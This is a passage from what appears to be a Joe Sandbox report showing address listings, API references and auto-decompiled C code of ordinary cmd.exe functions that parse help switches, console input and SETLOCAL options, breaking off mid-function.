0x00d89a5f
0x00da10a3
0x00da10ab
0x00da10ac
0x00da10b2
0x00da10b4
0x00d89a65
0x00d89a65
0x00d89a65
0x00d89a67
0x00d89a67
0x00d89a6e
0x00d89a6f
0x00d89a74
0x00d89a76
0x00da10bf
0x00da10c3
0x00d89a7c
0x00d89a7c
0x00d89a80
0x00d89a89
0x00d89a8a
0x00d89a8c
0x00d89a8e
0x00d89a8e
0x00d89a8f
0x00d89a99
0x00d89a9f
0x00d89aa0
0x00d89aa1
0x00d89aa3
0x00000000
0x00000000
0x00d89aa9
0x00d89ab3
0x00d89ab9
0x00d89aba
0x00d89abb
0x00d89abd
0x00d89c3b
0x00d89c19
0x00d89c19
0x00d89c1b
0x00d89a8f
0x00d89a99
0x00d89a9f
0x00d89aa0
0x00d89aa1
0x00d89aa3
0x00000000
0x00000000
0x00000000
0x00d89aa3
0x00000000
0x00d89a8f
0x00d89acd
0x00d89ad3
0x00d89ad4
0x00d89ad5
0x00d89ad7
0x00d89bb9
0x00d89bbd
0x00d89bbf
0x00d89bc4
0x00d89bcc
0x00d89bcd
0x00d89bd0
0x00000000
0x00d89bd6
0x00d89bd8
0x00d89bd9
0x00d89bdc
0x00000000
0x00d89be2
0x00d89be2
0x00d89be6
0x00d89c46
0x00d89c46
0x00d89be8
0x00d89bed
0x00d89bf4
0x00d89bf9
0x00d89bfb
0x00000000
0x00d89c01
0x00d89c01
0x00d89c07
0x00000000
0x00d89c07
0x00d89bfb
0x00d89bdc
0x00000000
0x00d89add
0x00d89ae7
0x00d89aed
0x00d89aee
0x00d89aef
0x00d89af2
0x00d89af4
0x00da10d1
0x00da10d4
0x00da10d6
0x00da10db
0x00da10df
0x00da10e1
0x00da10e1
0x00da10e6
0x00da10ee
0x00da10ef
0x00da10f2
0x00000000
0x00da10f8
0x00da10fa
0x00da10fb
0x00da10fe
0x00000000
0x00da1104
0x00da1104
0x00da1109
0x00da1110
0x00da1115
0x00da1117
0x00da1127
0x00da1127
0x00da1132
0x00000000
0x00da1119
0x00da1119
0x00da111f
0x00d89c0a
0x00d89c0f
0x00d89c11
0x00d89c14
0x00000000
0x00d89c14
0x00da1117
0x00da10fe
0x00000000
0x00d89afa
0x00d89afa
0x00d89afc
0x00d89afe
0x00d89b01
0x00d89c25
0x00d89c28
0x00d89c2e
0x00d89c30
0x00da1138
0x00da1138
0x00da113b
0x00da1141
0x00da1144
0x00da114a
0x00da114a
0x00da1144
0x00da113b
0x00d89c30
0x00d89c28
0x00d89b01
0x00d89afc
0x00d89af4
0x00d89b09
0x00000000
0x00d89c41
0x00d89c41
0x00000000
0x00d89c41
0x00d89a8f
0x00d89b0a
0x00d89b0a
0x00d89b11
0x00da1154
0x00da1154
0x00d89b17
0x00d89b17
0x00d89b1f
0x00d89b25
0x00d89b26
0x00d89b28
0x00000000
0x00d89b2e
0x00d89b2e
0x00d89b35
0x00d89b3a
0x00d89b3d
0x00d89b42
0x00d89b44
0x00000000
0x00d89b4a
0x00d89b4a
0x00d89b51
0x00000000
0x00000000
0x00d89b51
0x00d89b44
0x00d89b28
0x00d89b57
0x00d89b5a
0x00d89b5f
0x00d89b60
0x00d89b63
0x00d89b64
0x00d89b69
0x00d89b6e
0x00d89b73
0x00d89b76
0x00d89b77
0x00d89b7a
0x00d89b7b
0x00d89b80
0x00d89b85
0x00d89b8a
0x00d89b8d
0x00d89b92
0x00d89b95
0x00d89b98
0x00d89b9b
0x00d89b9c
0x00d89ba3
0x00d89ba4
0x00d89ba9
0x00d89bac
0x00d89bae
0x00da115e
0x00da115e
0x00d89bae
0x00d89bb4
0x00d89bb5
0x00d89bb7
0x00d89bb8
0x00d904cc
0x00d904d6
0x00d904dc
0x00d904df
0x00d904e1
0x00000000
0x00d904e7
0x00d904f1
0x00d904f7
0x00d904fa
0x00d904fc
0x00d905d4
0x00d905d4
0x00d8d812
0x00d8d814
0x00d8d81a
0x00d8d81b
0x00d8d81c
0x00d8d81e
0x00d9b9cb
0x00d9b9cd
0x00d9b9cf
0x00d9b9d5
0x00d9b9d5
0x00d8d826
0x00d8d82c
0x00d8d82e
0x00d8d830
0x00d9b9dd
0x00d9b9de
0x00d9b9e6
0x00d9b9e7
0x00d9b9ed
0x00d9b9ef
0x00d8d836
0x00d8d836
0x00d8d836
0x00d8d838
0x00d8d838
0x00d8d83f
0x00d8d840
0x00d8d845
0x00d8d847
0x00d9b9fa
0x00d9b9fe
0x00000000
0x00d8d84d
0x00d8d84d
0x00d8d84f
0x00d8d855
0x00d8d871
0x00d8d873
0x00d8d875
0x00d8d875
0x00d8d877
0x00d8d857
0x00d8d861
0x00d8d867
0x00d8d868
0x00d8d869
0x00d8d86b
0x00d8d919
0x00d8d91b
0x00000000
0x00000000
0x00000000
0x00d8d86b
0x00d8d87c
0x00d8d87e
0x00d8d883
0x00d8d886
0x00d8d888
0x00d8d88a
0x00d8d88c
0x00d8d921
0x00d8d924
0x00d8d932
0x00d8d932
0x00d8d926
0x00d8d926
0x00d8d88c
0x00d8d894
0x00d8d895
0x00d8d89a
0x00d8d89d
0x00d8d89f
0x00d9ba09
0x00d9ba09
0x00d8d8a5
0x00d8d8aa
0x00d8d8ac
0x00d8d8d7
0x00d8d8d7
0x00d8d8d8
0x00d8d8da
0x00d8d8db
0x00d8d8dc
0x00d8d8ae
0x00d8d8ae
0x00d8d8b0
0x00d8d8b5
0x00d8d8c0
0x00d8d8c6
0x00d8d8c7
0x00d8d8c8
0x00d8d8ca
0x00d8d8dd
0x00d8d8e2
0x00d8d8e5
0x00d8d8ea
0x00d8d8ec
0x00d9ba13
0x00d9ba1f
0x00d9ba25
0x00d9ba26
0x00d9ba26
0x00d9ba26
0x00d9ba28
0x00d8da46
0x00d8da46
0x00d8da49
0x00d8da4b
0x00d8da4d
0x00000000
0x00000000
0x00d8d9f1
0x00d8d9f4
0x00d8d9f6
0x00d8d9f9
0x00d8d9f9
0x00d8d9fc
0x00d8d9ff
0x00d8d9ff
0x00d8da04
0x00d8da06
0x00d8da08
0x00d8da0d
0x00d8da10
0x00d8da14
0x00d8da19
0x00d8da1c
0x00d8da1e
0x00d8da21
0x00d8da23
0x00d8da26
0x00d8da26
0x00d8da29
0x00d8da2c
0x00d8da2c
0x00d8da31
0x00d8da33
0x00d8da35
0x00d8da36
0x00d8da39
0x00d8da3b
0x00d8da40
0x00000000
0x00000000
0x00d8da40
0x00d8da39
0x00d8da1c
0x00d8da4f
0x00d8da55
0x00d8da5b
0x00d8da5e
0x00d9ba31
0x00d9ba36
0x00000000
0x00d8da64
0x00d8da66
0x00d8da67
0x00d8da6c
0x00d8da72
0x00d8da74
0x00d8db8d
0x00d8db8d
0x00d8db8f
0x00d8da7a
0x00d8da7a
0x00d8da80
0x00d8da83
0x00d8da88
0x00d8da8b
0x00d8da8d
0x00d8da8d
0x00d8da90
0x00d8da92
0x00d8da98
0x00d8da98
0x00d8da9b
0x00d8da9b
0x00d8da9e
0x00000000
0x00d8daa4
0x00d8daa6
0x00d8daac
0x00d8daad
0x00d8daaf
0x00d9ba90
0x00d9ba90
0x00000000
0x00d8dab5
0x00d8dab7
0x00d8dabd
0x00d8dabe
0x00d8dac1
0x00000000
0x00d8dac7
0x00d8dac7
0x00d8dac9
0x00d8dace
0x00d8dad0
0x00d9ba41
0x00d9ba43
0x00d9ba48
0x00d9ba4a
0x00000000
0x00d9ba50
0x00d9ba56
0x00d9ba5c
0x00d9ba5e
0x00d9ba64
0x00d9ba66
0x00000000
0x00d9ba6c
0x00d9ba6e
0x00d9ba7e
0x00d9ba83
0x00d9ba84
0x00d9ba86
0x00000000
0x00d9ba86
0x00d9ba66
0x00d8dad6
0x00d8dad6
0x00d8dad6
0x00d8dad8
0x00d8dadd
0x00d8dae0
0x00d8dae2
0x00d9bb26
0x00d9bb36
0x00d9bb3b
0x00d9bb3c
0x00d9bb3e
0x00d9bb43
0x00d9bb43
0x00d9bb48
0x00d9bb4b
0x00d9bb4e
0x00000000
0x00d8dae8
0x00d8dae8
0x00d8daea
0x00d8daef
0x00d8daef
0x00d8daf2
0x00d8daf6
0x00d8db6d
0x00d8db6f
0x00d8db73
0x00d8db76
0x00d8db78
0x00d8db7c
0x00d8db7f
0x00d8db84
0x00d8db86
0x00000000
0x00d8db88
0x00000000
0x00d8db88
0x00d8daf8
0x00d8daf8
0x00d8dafd
0x00d8dafe
0x00d9ba98
0x00d9ba9d
0x00d9baa2
0x00d9baa8
0x00d9baaa
0x00000000
0x00d9bab0
0x00d9bab0
0x00d9bab5
0x00d9baba
0x00d9babc
0x00000000
0x00d9bac2
0x00d9bac2
0x00d9bac5
0x00d9bac7
0x00d9bac9
0x00d9bac9
0x00d9bad9
0x00d9badf
0x00d9bae1
0x00000000
0x00d9bae7
0x00d9bae7
0x00d9baea
0x00d9baec
0x00d9baee
0x00d9baee
0x00d9baf4
0x00d9baf5
0x00000000
0x00d9baf5
0x00d9bae1
0x00d9babc
0x00d8db04
0x00d8db07
0x00d8db09
0x00d8db0b
0x00d8db11
0x00d8db11
0x00d8db17
0x00d8db17
0x00d8db1c
0x00d8db22
0x00d8db24
0x00d9bb89
0x00d9bb89
0x00d9bb8e
0x00d9bb94
0x00000000
0x00d8db2a
0x00d8db2a
0x00d8db2a
0x00d8db2c
0x00d9baff
0x00d9bb01
0x00d9bb03
0x00d9bb08
0x00d9bb0e
0x00d9bb10
0x00d9bb15
0x00d9bb18
0x00d9bb58
0x00d9bb58
0x00d9bb5f
0x00d9bb7c
0x00000000
0x00d9bb1a
0x00d9bb1a
0x00d9bb1c
0x00000000
0x00d9bb1c
0x00d8db32
0x00d8db32
0x00d8db32
0x00d8db34
0x00000000
0x00d8db3a
0x00d8db3a
0x00d8db40
0x00000000
0x00d8db40
0x00d8db34
0x00d8db2c
0x00d8db24
0x00d8dafe
0x00d8daf6
0x00d8dae2
0x00d8dad0
0x00d8dac1
0x00d8daaf
0x00000000
0x00d8db43
0x00d8db43
0x00d8db46
0x00d8db48
0x00d8db48
0x00d8da9b
0x00d8da92
0x00d8da74
0x00d8db50
0x00d8db53
0x00d8db59
0x00d8db5a
0x00d8db5d
0x00d8db5f
0x00d8db60
0x00d8db61
0x00d8db61
0x00d8db63
0x00d8db64
0x00d8db69
0x00d8db6b
0x00d8db6c
0x00000000
0x00d8db6c
0x00d8d8f2
0x00d8d8f2
0x00d8d8f8
0x00d8d8fb
0x00d8d8fe
0x00d8d905
0x00d8d906
0x00d8d90b
0x00d8d90e
0x00d8d910
0x00d8d912
0x00d8d912
0x00000000
0x00d8d910
0x00d8d8cc
0x00d8d8ce
0x00d8d8d0
0x00d8d8d0
0x00d8d8d2
0x00000000
0x00d8d8d2
0x00d8d8ca
0x00d8d8ac
0x00d90502
0x00d9050c
0x00d90512
0x00d90515
0x00d90517
0x00000000
0x00d9051d
0x00d90527
0x00d9052d
0x00d90530
0x00d90532
0x00d90551
0x00d90551
0x00d8de5e
0x00d8de60
0x00d8de66
0x00d8de67
0x00d8de68
0x00d8de6a
0x00d9bca8
0x00d9bcaa
0x00d9bcac
0x00d9bcb2
0x00d9bcb2
0x00d8de72
0x00d8de78
0x00d8de7a
0x00d8de7c
0x00d9bcba
0x00d9bcbb
0x00d9bcc3
0x00d9bcc4
0x00d9bcca
0x00d9bccc
0x00d8de82
0x00d8de82
0x00d8de82
0x00d8de84
0x00d8de84
0x00d8de8b
0x00d8de8c
0x00d8de91
0x00d8de93
0x00d9bcd7
0x00d9bcdb
0x00000000
0x00d8de99
0x00d8de9b
0x00d8de9d
0x00d8de9f
0x00d8dea4
0x00d8dea9
0x00d8deab
0x00d8dee6
0x00d8dee6
0x00d8dee7
0x00d8dee9
0x00d8deea
0x00d8deeb
0x00d8dead
0x00d8deaf
0x00d8deb0
0x00d8deb5
0x00d8deba
0x00d8deee
0x00d8def0
0x00d8def2
0x00000000
0x00d8debc
0x00d8debc
0x00d8dec1
0x00d8dec4
0x00d8dec9
0x00d8decb
0x00d9bce6
0x00d9bcf2
0x00d9bcf8
0x00d9bcf9
0x00d9bcfb
0x00d9bd01
0x00d9bd03
0x00d9bd03
0x00d8dfb0
0x00d8dfb1
0x00d8dfb2
0x00d8dfb4
0x00d8dfb5
0x00d8ded1
0x00d8ded1
0x00d8ded7
0x00d8dede
0x00d8dee1
0x00000000
0x00d8dee1
0x00d8decb
0x00d8deba
0x00d8deab
0x00d90534
0x00d9053e
0x00d90544
0x00d90547
0x00d90549
0x00000000
0x00d9054b
0x00d9054b
0x00d8ed82
0x00d8ed83
0x00d8ed85
0x00d8ed88
0x00d8ed89
0x00d8ed8a
0x00d8ed8d
0x00d8ed94
0x00d8ed95
0x00d8ed95
0x00d8ed97
0x00d8ed9f
0x00d8eda1
0x00d8eda4
0x00d8eda4
0x00d8eda9
0x00d8edab
0x00000000
0x00000000
0x00d8edad
0x00d8edb2
0x00d8edb7
0x00d8edbc
0x00d8ede9
0x00d8edec
0x00d8edf2
0x00d8edf4
0x00d9c0ad
0x00d9c0b0
0x00d9c0b0
0x00d9c0b3
0x00d9c0b6
0x00d9c0b6
0x00d9c0bb
0x00d9c0bf
0x00d9c0bf
0x00d8edfa
0x00d8ee02
0x00d8ee04
0x00d8ee07
0x00d8ee09
0x00d9c0f7
0x00d9c103
0x00d9c109
0x00d9c10a
0x00d9c111
0x00d9c117
0x00d9c117
0x00d8efe1
0x00d8efe1
0x00d8efe3
0x00d8efea
0x00d8efef
0x00d9c121
0x00d9c123
0x00d9c125
0x00d9c125
0x00d8eff5
0x00d8eff7
0x00d8eff8
0x00d8eff9
0x00d8effa
0x00d8effb
0x00d8ee0f
0x00d8ee0f
0x00d8ee12
0x00d8ee14
0x00d9c0c7
0x00d9c0c9
0x00d9c0cb
0x00d9c0cb
0x00d8ee1a
0x00d8ee1c
0x00d8ee1e
0x00d9c0d5
0x00d9c0d5
0x00d8ee24
0x00d8ee24
0x00d8ee2a
0x00000000
0x00000000
0x00d8ee2a
0x00d8ee30
0x00d8ee32
0x00d9c0f0
0x00d9c0f0
0x00d8ee38
0x00d8ee38
0x00d8ee3a
0x00d8ee3c
0x00d8ee3e
0x00d8ee40
0x00d9c0eb
0x00d9c0eb
0x00000000
0x00d8ee46
0x00d8ee46
0x00d8ee46
0x00d8ee49
0x00000000
0x00000000
0x00d9c0df
0x00d9c0e2
0x00d9c0e2
0x00d9c0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9c0e5
0x00d8ee4f
0x00d8ee51
0x00000000
0x00d8ee57
0x00d8ee57
0x00d8ee59
0x00d8ee59
0x00d8ee59
0x00d8ee51
0x00d8ee40
0x00d8ee5b
0x00d8ee5b
0x00d8ee5d
0x00d8ee5f
0x00d8ee62
0x00d8ee64
0x00d8ee67
0x00d8ee67
0x00d8ee69
0x00d8ee99
0x00d8ee99
0x00d8ee6b
0x00d8ee6b
0x00d8ee6d
0x00d8ee73
0x00d8ee75
0x00d8ee7a
0x00d8ee7c
0x00d8ee7c
0x00d8ee80
0x00d8ee80
0x00d8ee82
0x00000000
0x00000000
0x00d8ee84
0x00d8ee88
0x00d8ee8b
0x00000000
0x00d8ee8d
0x00d8ee8d
0x00d8ee90
0x00d8ee91
0x00d8ee94
0x00d8ee94
0x00d8ee97
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ee97
0x00000000
0x00d8ee8b
0x00d8ee9e
0x00d8eea0
0x00000000
0x00000000
0x00d8eea0
0x00d8eea2
0x00d8eea2
0x00d8eea5
0x00d8eea5
0x00d8eea7
0x00d8eea7
0x00d8eeaa
0x00000000
0x00d8eeaa
0x00d8edbe
0x00d8edbe
0x00d8edc1
0x00d8edc3
0x00d8edc8
0x00d8edca
0x00d8eeb2
0x00d8eeb4
0x00d8eeb4
0x00d8eeb4
0x00d8eeb7
0x00d8eeb9
0x00d8eebc
0x00d8eebc
0x00d8eec0
0x00000000
0x00d8edd0
0x00d8edd1
0x00d8edd3
0x00d8edd3
0x00d8edd5
0x00000000
0x00d8edd5
0x00d8edca
0x00000000
0x00d8edbc
0x00d8edda
0x00d8eddd
0x00d8edde
0x00d8ede1
0x00d8ede3
0x00d8ede4
0x00d8ede5
0x00d8ede7
0x00d8ede8
0x00d8ede8
0x00d90549
0x00d90532
0x00d90517
0x00d904fc
0x00d904e1
0x00d904c6
0x00000000

APIs

_wcsicmp.MSVCRT ref: 00D904BB
_wcsicmp.MSVCRT ref: 00D904D6
_wcsicmp.MSVCRT ref: 00D904F1
_wcsicmp.MSVCRT ref: 00D9050C
_wcsicmp.MSVCRT ref: 00D90527
_wcsicmp.MSVCRT ref: 00D9053E

Strings

REM, xrefs: 00D90522
IF/?, xrefs: 00D90507
REM/?, xrefs: 00D90539
FOR, xrefs: 00D904B6
FOR/?, xrefs: 00D904D1

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: FOR$FOR/?$IF/?$REM$REM/?
API String ID: 2081463915-3874590324
Opcode ID: 7108e536663d2718ca769dbe930f0b15a1a055fcd0bebc9917a2478edf4175ac
Instruction ID: 8644c1c2dd2534c5d522be9835f8eddf9bfc87a5f087d1ff0c4fd28267e7e02e
Opcode Fuzzy Hash: 7108e536663d2718ca769dbe930f0b15a1a055fcd0bebc9917a2478edf4175ac
Instruction Fuzzy Hash: 0331D2307403028EDFA47B68BC1A7B97A919B40B41F598036F587E52D0DFA0C989DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA474C, Relevance: 18.2, APIs: 12, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00DA474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v2060;
				char _v2061;
				char _v2062;
				signed int _v2068;
				long _v2072;
				long _v2076;
				void* _v2080;
				intOrPtr _v2088;
				signed int _t36;
				long* _t38;
				void* _t40;
				signed int _t43;
				long _t44;
				wchar_t* _t45;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t58;
				signed int _t60;
				void* _t61;
				intOrPtr _t63;
				wchar_t* _t70;
				long _t71;
				wchar_t* _t72;
				wchar_t* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t89;
				void* _t102;
				long _t103;
				wchar_t* _t104;
				void* _t106;
				wchar_t* _t107;
				signed int _t108;

				_t99 = __edx;
				_t36 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t36 ^ _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v2061 = 0;
				_v2062 = 0;
				_t38 = E00D8DF40(__ecx);
				if(_t38 == 0) {
					L3:
					_t40 = 1;
					goto L4;
				} else {
					_t82 = _t38;
					_t107 = E00D92430(_t38);
					_t43 =  *_t107 & 0x0000ffff;
					if(_t43 != 0) {
						_t103 = 0x22;
						if(_t43 == _t103) {
							_t5 =  &(_t107[0]); // 0x2
							_t107 = E00D92430(_t5);
							_t74 = wcsrchr(_t107, _t103);
							if(_t74 != 0) {
								 *_t74 = 0;
							}
						}
						_t44 = 0x3d;
						_t45 = wcschr(_t107, _t44);
						_pop(_t82);
						if(_t45 == 0) {
							goto L2;
						} else {
							 *_t45 = 0;
							_t6 =  &(_t45[0]); // 0x2
							_t82 = _t6;
							_t104 = E00D92430(_t6);
							_t48 = 0x22;
							if( *_t104 == _t48) {
								_t7 =  &(_t104[0]); // 0x2
								_t70 = E00D92430(_t7);
								_t104 = _t70;
								_t71 = 0x22;
								_t72 = wcsrchr(_t104, _t71);
								_pop(_t82);
								if(_t72 != 0) {
									_t82 = 0;
									 *_t72 = 0;
								}
							}
							_t49 = 0x3d;
							if( *_t104 == _t49) {
								goto L2;
							} else {
								_t78 = GetStdHandle(0xfffffff5);
								if(GetConsoleMode(_t78,  &_v2072) != 0) {
									_v2061 = 1;
									SetConsoleMode(_t78, _v2072 | 0x00000001);
								}
								_t53 = GetStdHandle(0xfffffff6);
								_t87 =  &_v2076;
								_v2080 = _t53;
								if(GetConsoleMode(_t53,  &_v2076) != 0) {
									_t87 = _v2076 | 0x00000007;
									_v2062 = 1;
									SetConsoleMode(_v2080, _v2076 | 0x00000007);
								}
								E00D8C108(_t87, 0x2371, 1, _t104);
								_v2060 = 0;
								_t58 = GetStdHandle(0xfffffff6);
								_t99 =  &_v2060;
								_t88 = _t58;
								if(E00DA3B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
									L23:
									_t60 = 0;
									_v2068 = 0;
								} else {
									_t60 = _v2068;
									if(_t60 == 0) {
										goto L23;
									} else {
										_t88 = _t108 + _t60 * 2 - 0x80a;
										while( *_t88 < 0x20) {
											_t60 = _t60 - 1;
											_t88 = _t88 - 2;
											_v2068 = _t60;
											if(_t60 != 0) {
												continue;
											} else {
											}
											goto L24;
										}
									}
								}
								L24:
								if(_v2061 != 0) {
									SetConsoleMode(_t78, _v2072);
									_t60 = _v2068;
								}
								if(_v2062 != 0) {
									SetConsoleMode(_v2080, _v2076);
									_t60 = _v2068;
								}
								if(_t60 == 0) {
									goto L3;
								} else {
									_t61 = _t60 + _t60;
									if(_t61 >= 0x800) {
										E00D9711D(_t61, _t78, _t88, _t99, _t104, _t107);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t108);
										_t89 = _v2088;
										if( *0xdad5fc == 2) {
											_t63 = E00DA46A5(_t89, 0);
											L35:
											 *0xdbb8b0 = _t63;
											return _t63;
										}
										_t63 = E00DA46A5(_t89, 0);
										if(_t63 != 0) {
											goto L35;
										}
										return _t63;
									} else {
										_t99 =  &_v2060;
										 *((short*)(_t108 + _t61 - 0x808)) = 0;
										_t40 = E00D93A50(_t107,  &_v2060);
										L4:
										_pop(_t102);
										_pop(_t106);
										_pop(_t77);
										return E00D96FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
									}
								}
							}
						}
					} else {
						L2:
						_push(0);
						_push(0x232a);
						E00D8C5A2(_t82);
						goto L3;
					}
				}
			}

0x00da474c
0x00da4757
0x00da475e
0x00da4761
0x00da4762
0x00da4765
0x00da4766
0x00da476c
0x00da4772
0x00da4779
0x00da4799
0x00da479b
0x00000000
0x00da477b
0x00da477b
0x00da4782
0x00da4784
0x00da478a
0x00da47af
0x00da47b3
0x00da47b5
0x00da47bd
0x00da47c1
0x00da47cb
0x00da47cf
0x00da47cf
0x00da47cb
0x00da47d4
0x00da47d7
0x00da47de
0x00da47e1
0x00000000
0x00da47e3
0x00da47e5
0x00da47e8
0x00da47e8
0x00da47f0
0x00da47f4
0x00da47f8
0x00da47fa
0x00da47fd
0x00da4804
0x00da4806
0x00da4809
0x00da4810
0x00da4813
0x00da4815
0x00da4817
0x00da4817
0x00da4813
0x00da481c
0x00da4820
0x00000000
0x00da4826
0x00da482e
0x00da4840
0x00da484b
0x00da4854
0x00da4854
0x00da485c
0x00da4862
0x00da4868
0x00da4878
0x00da4880
0x00da4883
0x00da4891
0x00da4891
0x00da489f
0x00da48a9
0x00da48be
0x00da48c4
0x00da48ca
0x00da48d3
0x00da48fc
0x00da48fc
0x00da48fe
0x00da48d5
0x00da48d5
0x00da48dd
0x00000000
0x00da48df
0x00da48df
0x00da48e6
0x00da48ec
0x00da48ed
0x00da48f0
0x00da48f8
0x00000000
0x00000000
0x00da48fa
0x00000000
0x00da48f8
0x00da48e6
0x00da48dd
0x00da4904
0x00da490b
0x00da4914
0x00da491a
0x00da491a
0x00da4927
0x00da4935
0x00da493b
0x00da493b
0x00da4943
0x00000000
0x00da4949
0x00da4949
0x00da4950
0x00da496e
0x00da4973
0x00da4974
0x00da4975
0x00da4976
0x00da4977
0x00da4978
0x00da4979
0x00da497a
0x00da497b
0x00da497c
0x00da497d
0x00da497e
0x00da497f
0x00da4982
0x00da4985
0x00da4991
0x00da499e
0x00da49a3
0x00da49a3
0x00000000
0x00da49a3
0x00da4993
0x00da499a
0x00000000
0x00da499c
0x00da49a9
0x00da4952
0x00da4954
0x00da495a
0x00da4964
0x00da479c
0x00da479f
0x00da47a0
0x00da47a3
0x00da47ac
0x00da47ac
0x00da4950
0x00da4943
0x00da4820
0x00da478c
0x00da478c
0x00da478c
0x00da478d
0x00da4792
0x00000000
0x00da4798
0x00da478a

APIs

Part of subcall function 00D92430: iswspace.MSVCRT ref: 00D92440

wcsrchr.MSVCRT ref: 00DA47C1
wcschr.MSVCRT ref: 00DA47D7
wcsrchr.MSVCRT ref: 00DA4809
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00DA4828
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA4838
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA4854
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00DA485C
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA4870
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00DA4891
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00DA48BE
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA4914
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00DA4935

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
String ID:
API String ID: 4166807220-0
Opcode ID: 783e686ac8dbdb2e5a4322769000a83b26cba876edf689afd468cc04c0b7aaa7
Instruction ID: 4dd7fd25f4eab48501af3019f22b055a89485891a0c596106ca15b686c26bc73
Opcode Fuzzy Hash: 783e686ac8dbdb2e5a4322769000a83b26cba876edf689afd468cc04c0b7aaa7
Instruction Fuzzy Hash: 7F51D6316003599ADB24AB74DC19BBA77E9FF42310F1884A9E485D21D1EFB08E85CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8C430, Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155
memoryCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00D8C430() {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t21;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t37;
				char _t40;
				void* _t47;
				intOrPtr* _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t65;
				void* _t68;
				void* _t73;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t83;

				_t46 = _t83;
				_push(_t47);
				_push(_t47);
				_v8 =  *((intOrPtr*)(_t83 + 4));
				_t21 =  *0xdc3cc4;
				if(_t21 == 0) {
					L19:
					_t22 = 0;
				} else {
					if( *((intOrPtr*)(_t21 + 0x14)) >= 0x20) {
						_push(0);
						_push(0x4000271c);
						E00D8C5A2(_t47);
						goto L24;
					} else {
						_t50 =  *0xdc3cb8;
						if(_t50 == 0) {
							_t50 = 0xdc3ab0;
						}
						_t68 = _t50 + 2;
						do {
							_t25 =  *_t50;
							_t50 = _t50 + 2;
						} while (_t25 != 0);
						_t73 = (_t50 - _t68 >> 1) + 1;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0xc);
						if(_t77 == 0) {
							L24:
							_t22 = 1;
						} else {
							_t53 = HeapAlloc(GetProcessHeap(), 8, _t73 + _t73);
							 *_t77 = _t53;
							if(_t53 == 0) {
								goto L24;
							} else {
								_t31 =  *0xdc3cb8;
								if( *0xdc3cb8 == 0) {
									_t31 = 0xdc3ab0;
								}
								E00D91040(_t53, _t73, _t31);
								_t33 = E00D93B2C(_t53);
								 *((intOrPtr*)(_t77 + 4)) = _t33;
								if(_t33 == 0) {
									goto L24;
								} else {
									_t54 =  *0xdc3cc4;
									 *((char*)(_t77 + 8)) =  *0xdc3cc9;
									 *((char*)(_t77 + 9)) =  *0xdc3cc8;
									 *((intOrPtr*)(_t54 + 0x90 +  *(_t54 + 0x14) * 4)) = _t77;
									_t37 =  *0xdc3cd8;
									 *(_t54 + 0x14) =  *(_t54 + 0x14) + 1;
									 *((intOrPtr*)(_t54 + 0xc)) = _t37;
									if( *((intOrPtr*)(_t54 + 0x10)) < _t37) {
										 *((intOrPtr*)(_t54 + 0x10)) = _t37;
									}
									_t78 = E00D8EA40( *((intOrPtr*)( *((intOrPtr*)(_t46 + 8)) + 0x3c)), 0, 0);
									_t40 = 0;
									 *0xdbb8b0 = 0;
									while( *_t78 != _t40) {
										__imp___wcsicmp(_t78, L"ENABLEEXTENSIONS");
										if(_t40 != 0) {
											__imp___wcsicmp(_t78, L"DISABLEEXTENSIONS");
											if(_t40 == 0) {
												 *0xdc3cc9 = 0;
												goto L15;
											} else {
												__imp___wcsicmp(_t78, L"ENABLEDELAYEDEXPANSION");
												if(_t40 != 0) {
													__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
													_t65 = _t78;
													if(_t40 != 0) {
														if( *_t78 == 0) {
															goto L15;
